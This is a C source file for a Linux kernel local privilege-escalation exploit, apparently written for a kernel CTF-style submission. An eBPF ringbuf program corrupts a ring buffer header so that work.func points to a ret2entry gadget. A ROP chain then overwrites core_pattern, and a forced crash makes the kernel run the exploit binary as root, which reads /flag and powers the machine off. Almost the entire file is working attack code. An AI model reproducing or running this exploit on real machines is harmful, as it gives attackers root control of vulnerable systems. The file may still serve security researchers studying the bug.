#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/wait.h>
#include <linux/bpf.h>
#include <sys/mman.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <syscall.h>
#include <err.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <assert.h>
#include <sys/sendfile.h>

#include "r2e.h"

typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef short i16;
typedef int i32;

#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

#ifndef __NR_BPF
#define __NR_BPF 321
#endif
#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr))
#ifndef SYS_pidfd_getfd
#define SYS_pidfd_getfd 438
#endif
#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})

#define PAUSE           \
	{                   \
		printf(":");    \
		int x;          \
		read(0, &x, 1); \
	}

#define BPF_F_MMAPABLE 1024
#define BPF_FUNC_ringbuf_query 134
#define BPF_FUNC_ringbuf_reserve 131
#define BPF_MAP_TYPE_RINGBUF 27
#define BPF_FUNC_ringbuf_discard 133
#define BPF_FUNC_ringbuf_output 130

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
	((struct bpf_insn){.code = CODE,           \
					   .dst_reg = DST,         \
					   .src_reg = SRC,         \
					   .off = OFF,             \
					   .imm = IMM})

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                   \
	((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, \
					   .dst_reg = DST,                    \
					   .src_reg = SRC,                    \
					   .off = 0,                          \
					   .imm = (__u32)(IMM)}),             \
		((struct bpf_insn){.code = 0,                     \
						   .dst_reg = 0,                  \
						   .src_reg = 0,                  \
						   .off = 0,                      \
						   .imm = ((__u64)(IMM)) >> 32})

#define BPF_MOV64_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_MOV_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV64_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

#define BPF_MOV_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

#define BPF_RSH_REG(DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_RSH | BPF_X, DST, SRC, 0, 0)

#define BPF_LSH_IMM(DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_LSH | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_IMM(OP, DST, IMM) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_ALU64_REG(OP, DST, SRC) \
	BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

#define BPF_ALU_IMM(OP, DST, IMM) \
	BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
	BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_JMP_REG(OP, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
	BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

#define BPF_LD_MAP_FD(DST, MAP_FD) \
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
	BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
	BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

#define BPF_LD_ABS(SIZE, IMM)                                     \
	((struct bpf_insn){.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
					   .dst_reg = 0,                              \
					   .src_reg = 0,                              \
					   .off = 0,                                  \
					   .imm = IMM})

#define BPF_MAP_GET(idx, dst)                                   \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                        \
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                   \
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                  \
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                 \
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,               \
					 BPF_FUNC_map_lookup_elem),                 \
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \
		BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                 \
		BPF_MOV64_IMM(BPF_REG_0, 0)

#define BPF_MAP_GET_ADDR(idx, dst)                              \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                        \
		BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                   \
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                  \
		BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                 \
		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,               \
					 BPF_FUNC_map_lookup_elem),                 \
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \
		BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0)

#define INST(x) (sizeof(x) / sizeof(struct bpf_insn))

char buf[0x1000];
struct bpf_insn prog[] = {

	BPF_LD_MAP_FD(BPF_REG_1, 0x100),
	BPF_MOV64_IMM(BPF_REG_2, 0x3000),
	BPF_MOV64_IMM(BPF_REG_3, 0x0),

	/* allocate first chunk with 0x3000 size */
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x0, 1),
	BPF_EXIT_INSN(),

	BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

	BPF_LD_MAP_FD(BPF_REG_1, 0x100),
	BPF_MOV64_IMM(BPF_REG_2, 0x3000),
	BPF_MOV64_IMM(BPF_REG_3, 0x0),
	/* allocate second chunk with 0x3000 size */
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0x0, 5),

	/* failed path */
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
	BPF_MOV64_IMM(BPF_REG_2, 2),
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_EXIT_INSN(),

	BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
	BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),

	/* point second chunk to first chunk's ringbuf header */
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0xff0),

	/* change pg_off to 2, so bpf_ringbuf will point
 		to user controlled content at bpf_ringbuf_commit */
	BPF_ST_MEM(BPF_W, BPF_REG_6, 4, 2),

	/* discard all ringbuf to make verifier pass and to trigger RIP control */
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),
	BPF_MOV64_IMM(BPF_REG_2, 2), // BPF_RB_FORCE_WAKEUP
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

	BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),
	BPF_MOV64_IMM(BPF_REG_2, 2), // BPF_RB_FORCE_WAKEUP
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),

	BPF_MOV64_IMM(BPF_REG_0, 0),
	BPF_EXIT_INSN(),
};

int bpf(int cmd, void *attr, size_t n)
{
	return syscall(SYS_bpf,cmd,attr,n);
}

int bpf_create_map(enum bpf_map_type map_type, unsigned int key_size,
				   unsigned int value_size, unsigned int max_entries,
				   unsigned int map_fd)
{
	union bpf_attr attr = {.map_type = map_type,
						   .key_size = key_size,
						   .value_size = value_size,
						   .max_entries = max_entries,
						   .inner_map_fd = map_fd};

	return bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}


int bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns,
				  int insn_cnt, const char *license)
{
	union bpf_attr attr = {
		.prog_type = type,
		.insns = ptr_to_u64(insns),
		.insn_cnt = insn_cnt,
		.license = ptr_to_u64(license),
		.log_buf = 0,
		.log_size = 0,
		.log_level = 1,
	};

	return bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}


int load_prog()
{
	char license[] = "GPL";
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog,
						 sizeof(prog) / sizeof(struct bpf_insn), license);
}

int check_core()
{
	// Check if /proc/sys/kernel/core_pattern has been overwritten
	char buf[0x100] = {};
	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
	read(core, buf, sizeof(buf));
	close(core);
	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
	int memfd = memfd_create("", 0);
	// send our binary to memfd for core_pattern payload
	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
	// our binary now at file descriptor 666
	dup2(memfd, 666);
	close(memfd);
	while (check_core() == 0)
		sleep(1);
	puts("Root shell !!");
	/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
	*(size_t *)0 = 0;
}

int main(int argc, char **argv)
{
	setvbuf(stdout, 0, 2, 0);
	pin_cpu(1);

	if (argc > 1)
	{
		// #define SYS_pidfd_getfd 438
		int pid = strtoull(argv[1], 0, 10);
		int pfd = syscall(SYS_pidfd_open, pid, 0);
		int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
		int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
		int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
		dup2(stdinfd, 0);
		dup2(stdoutfd, 1);
		dup2(stderrfd, 2);

		/* Get flag and poweroff immediately to boost next round try in PR verification workflow*/
		system("dmesg | grep CFI; id; cat /flag; sleep 8; echo o>/proc/sysrq-trigger");
		execlp("bash", "bash", NULL);
	}

    size_t kbase = 0xffffffff81000000;
    size_t phys = 0xffff888000000000;

	if (fork() == 0) // this process is used to trigger core_pattern exploit
	{
		pin_cpu(3);
		setsid();
		crash("");
	}

    // ret2entry setup
    u64 guess = phys + 0x108000000;
    void **r2e_pages = huge_page_spray(128);
    wrgsbase(guess);
    printf("guess: %lx\n", guess);

    // ret2entry gadget (entry_SYSCALL_compat)
    u64 r2e_gadget = 0x1202430+0x10; // + 0x10 for FineIBT stub

	size_t core_pattern = 0x242eb00;
	size_t _copy_from_user = 0x820770;
	size_t msleep = 0x1f80e0;

	size_t swapgs_pop_rbp_ret = 0x1201d10;
	size_t pop_rdi = 0x902a10;
	size_t pop_rsi = 0x10ef1fe;
	size_t pop_rdx = 0x90299a;

    u64 rop[] = {
      kbase + swapgs_pop_rbp_ret,
      0,
      kbase + pop_rdi,
      kbase + core_pattern,
      kbase + pop_rsi,
      (size_t)0xa00000, // addr of userspace buffer
      kbase + pop_rdx,
      20, // strlen+1 of userspace buffer contents
      kbase + _copy_from_user,
      kbase + pop_rdi,
      0x10000000,
      kbase + msleep,
    };

    // ret2entry
    int rop_len = sizeof(rop)/sizeof(rop[0]);
    populate_spray(r2e_pages, 128, guess, rop_len, rop);
    spawn_orw_thread(0, 128, r2e_pages, guess, kbase);

    sleep(10);


	char *core = (void *)mmap(
        (void *)0xa00000,
        0x2000,
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_FIXED | MAP_ANON,
        -1,
        0
    );

	// setup core_pattern payload that will execute /proc/pid/fd/666
	// which we already prepare before
	strcpy(core, "|/proc/%P/fd/666 %P"); // put payload string into 0xa00000 which will used by ROP gadget

	int ringbuf = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x4000, 0);

	/* dup ringbuf at 0x100, easily known by bpf program */
	SYSCHK(dup2(ringbuf, 0x100));

	/* mmap ringbuf consumer_pos data */
	size_t *addr = SYSCHK(mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ringbuf, 0));

	addr[0] = 0x3000; // modify consumer_pos to 0x3000

	//work.func is started at offset 0x28:
 	//gef➤  p &((struct bpf_ringbuf*)0)->work.func
	//$2 = (void (**)(struct irq_work *)) 0x28 <fixed_percpu_data+40>
	addr[0x28 / 8] = kbase + r2e_gadget;
	addr[0x38 / 8] = 0xffffffffdeadbeef;

	/* load our bpf prog exploit */
	int progfd = load_prog();

	int sockets[2];
	/* create dummy sockets and attaching our bpf program */
	socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets);
	setsockopt(
        sockets[1],
        SOL_SOCKET,
        SO_ATTACH_BPF,
        &progfd,
        sizeof(progfd)
    );
	/* trigger execution of our bpf exploit */
	write(sockets[0],buf,1);

    while (1) {}
}
